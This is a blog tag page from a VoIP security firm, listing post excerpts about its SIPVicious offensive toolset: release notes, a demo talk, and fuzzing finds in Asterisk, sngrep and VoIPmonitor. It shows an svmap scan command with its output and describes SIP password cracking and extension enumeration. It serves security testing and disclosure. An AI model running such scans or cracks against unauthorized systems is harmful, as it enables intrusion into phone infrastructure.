Skip to main content

Tags Sip Security

DEMO - An overview of the VoIP and RTC offensive security toolset, SIPVicious PRO

Published on May 25, 2021 in , , , , , ,

We pushed out a video that introduces the basics of SIPVicious PRO by demonstrating some of the attack tools and showing the building blocks for automating security testing of VoIP and WebRTC applications and infrastructure.

What follows is a transcript of the video.

Introduction

Hello, I’m Sandro Gauci from Enable Security. In this video, I’d like to show you what we have been working on, SIPVicious PRO! Let’s start by introducing the tools. SIPVicious PRO is a command-line toolset, meant to test the security of realtime communications, which includes Voice over IP as well as WebRTC infrastructure.

Read more about DEMO - An overview of the VoIP and RTC offensive security toolset, SIPVicious PRO

SIPVicious PRO 6.0.0-beta.4 getting close to take-off!

Published on May 20, 2021 in , , ,

This one’s a bit of a boring update for SIPVicious PRO. That’s because we’re getting to a stable place where flag names and values do not change too often. Which means, we’re getting out of beta rather soon!

However, it is still a major update because we made a significant number of internal changes. For example, we standardized a number of flags to be the same across all tools. We discovered that we can minimize each tool’s flagset by making use of config flags such as --auth-config that allows you to configure behaviours specific to how SIPVicious handles authentication (e.g. selecting a specific algorithm for digest authentication). This allows us to better show those flags that are more commonly used and hide the really custom or advanced ones away until they’re actually needed. And obviously, we fixed lots of bugs.

Read more about SIPVicious PRO 6.0.0-beta.4 getting close to take-off!

TADSummit Asia 2021 talk about SIPVicious Pro and the Demo Server

Published on May 18, 2021 in , , , , , , , ,

TADSummit is a great event where people from different backgrounds that are somehow involved in communications, contribute in various ways. I, personally, always look forward to see what’s coming up in the next TADSummit event. At the moment, TADSummit Asia presentations are currently being released on a daily basis on the main site. And last week, the presentation that I prepared was published!

In the previous TADSummit, I had presented about why we need to bring an offensive approach to RTC security. In this one, I introduce our contributions to the space, i.e. SIPVicious OSS, SIPVicious PRO and the demo server.

Read more about TADSummit Asia 2021 talk about SIPVicious Pro and the Demo Server

SIPVicious OSS 0.3.3 released with new STDIN and target URL specification

Published on Mar 25, 2021 in , , ,

Without further ado, please say hello to SIPVicious OSS 0.3.3!

To install or upgrade run pip install -U sipvicious. For more installation methods, see the wiki.

What’s new?

SIP extensions and passwords from standard input

We have a new feature which seems so simple yet so powerful: STDIN for dictionary input! This works for both svwar and svcrack. It is similar to what we did with SIPVicious PRO, which (surprisingly) proved to be a very popular feature. So, we thought of backporting it to SVOSS (SIPVicious OSS). From now on, one can easily use external tools to generate passwords on the fly for cracking with svcrack, or to generate SIP extensions on the fly for SIP extension enumeration with svwar. To do so, instead of specifying a filename to the --dictionary flag, give it - as its value.

Read more about SIPVicious OSS 0.3.3 released with new STDIN and target URL specification

Bug discovery diaries: Abusing VoIPmonitor for Remote Code Execution

Published on Mar 16, 2021 in , , , , , ,

Executive summary (TL;DR)

We fuzzed VoIPmonitor by using SIPVicious PRO and got a crash in the software’s live sniffer feature when it is switched on. We identified the cause of the crash by looking at the source code, which was a classic buffer overflow. Then we realized that was fully exploitable since the binaries distributed do not have any memory corruption protection. So we wrote exploit code using ROP gadgets to get remote code execution by just sending a SIP packet. We also reported this upstream so that it was fixed in the official distribution.

Read more about Bug discovery diaries: Abusing VoIPmonitor for Remote Code Execution

SIPVicious OSS 0.3.2 released with more IPv6 goodness!

Published on Mar 3, 2021 in , , ,

The free and opensource version of SIPVicious has been updated so that support for IPv6 is also available in svmap. If you can’t wait to try it out, you can get it at the official repository or by using pip3 install sipvicious --upgrade.

So now, with svmap’s IPv6 support, you can do stuff like:

sipvicious_svmap -6 -v 2a01:7e01::f03c:92ff:fecf:60a8

INFO:DrinkOrSip:trying to get self ip .. might take a while
INFO:root:start your engines
INFO:DrinkOrSip:-:61500        ->      2a01:7e01::f03c:92ff:fecf:60a8:5060     ->      kamailio (5.4.4 (x86_64/linux))
INFO:root:we have 1 devices
+-------------------------------------+---------------------------------+
| SIP Device                          | User Agent                      |
+=====================================+=================================+
| 2a01:7e01::f03c:92ff:fecf:60a8:5060 | kamailio (5.4.4 (x86_64/linux)) |
+-------------------------------------+---------------------------------+
INFO:root:Total time: 0:00:03.028053

Do note that CIDR scans on IPv6 are unsupported, but of course, one can scan multiple ports for SIP on a target.

Read more about SIPVicious OSS 0.3.2 released with more IPv6 goodness!

SIPVicious PRO 6.0.0-beta.2 takes STDIN and fixes various bugs

Published on Feb 9, 2021 in , , ,

What we’re excited about in this minor update is the addition of a new feature to the SIP cracker in SIPVicious PRO. Basically, it now takes input from external tools through standard input.

Why? Because it allows infinite ways of generating potential usernames, passwords and/or SIP extensions when making use of external tools such as the maskprocessor included in the well known password cracker, hashcat. Here’s an animation showing usage of the maskprocessor to generate passwords for the SIP online cracking tool:

Read more about SIPVicious PRO 6.0.0-beta.2 takes STDIN and fixes various bugs

Bug discovery diaries: uncovering sngrep overflow issues with blackbox fuzzing

Published on Jan 5, 2021 in , , , ,

Executive summary (TL;DR)

During OpenSIPIt, we crashed sngrep by mistake while briefly fuzzing OpenSIPS. Later on we setup a docker environment to reproduce the issue, identified the actual bugs and reported them upstream. If you want to learn the simple steps to do this, you actually have to read the rest of the post :-)

sngrep crash during the live OpenSIPit event

Last year we participated in OpenSIPIt’s interoperability testing event which was held between the 14th and 15th of September 2020. Amongst the topics discussed were RFC8760 (SHA-digest), STIR/SHAKEN and RFC8599 (push notifications). Whilst trying to stick to the agenda, we couldn’t resist the temptation to fuzz test the servers that were available to us. An instance of OpenSIPS was tested for a very short period of time, however, we did not observe any server crashes.

Read more about Bug discovery diaries: uncovering sngrep overflow issues with blackbox fuzzing

SIPVicious PRO beta release contains SIP fuzzer and better automation

Published on Dec 3, 2020 in , , , ,

We just made SIPVicious PRO v6.0.0-beta.1 available to our beta testers. This latest release brings a new SIP fuzzer and enhancements for automation to your favourite RTC offensive security toolset. We have the following highlights with this release:

  • New fuzzing tools - sip fuzz method. This used to be in a separate internal tool called gasoline (see our toolset page); this now been polished and has joined the SVPRO toolset; this has been used to identify vulnerabilities in Kamailio (advisory), sngrep (advisory 1 and 2) and other SIP servers.
  • Tool results provided at the end of a test are now standardized with a JSON schema so that they can easily be parsed or used to produce reports by third-party tools. See the documentation about automation and results.
  • Exit codes updated for future compatibility when using it within automation systems. See the documentation about signal handling and exit codes.
  • Full IPv6 support across all tools.
  • Documentation site is now refreshed, and central to SIPVicious PRO at https://docs.sipvicious.pro.
  • And of course, various bug fixes. Full changelog can be seen here.

Read more about SIPVicious PRO beta release contains SIP fuzzer and better automation

How doing QA testing for SIPVicious PRO led to an Asterisk DoS

Published on Nov 10, 2020 in , , , ,

Executive summary (TL;DR)

While heavily testing SIPVicious PRO for bugs, we encountered an unexpected crash in Asterisk. We reported this to the Asterisk team, who issued a fix. (Update February 4, 2026: SIPVicious PRO is an internal tool and is not sold or licensed.)

How the Asterisk crash was found

We test our software as much as we can because, like any other software, ours contains bugs too! When it comes to SIPVicious PRO, one of our quality assurance tests is to run it against instances of Asterisk and Kamailio and check for expected results. Our test suite loads these servers in a docker environment and automatically runs SIPVicious PRO against these targets. During these tests, we look for crashes, race conditions and other unchecked states that we might have failed to address in our own code. We do this through various methods, one of which is to observe exit codes in SIPVicious PRO that indicate the result of the test.

Read more about How doing QA testing for SIPVicious PRO led to an Asterisk DoS

Subscribe

Receive high-quality, low-volume RTC security research, news and occasional updates about what we're up to.

Interested in our services? Let's collaborate.
Get in touch

We hate spam and are committed to protecting and respecting your privacy. You can unsubscribe from our communications at any time. By subscribing, you are agreeing to the Privacy Policy.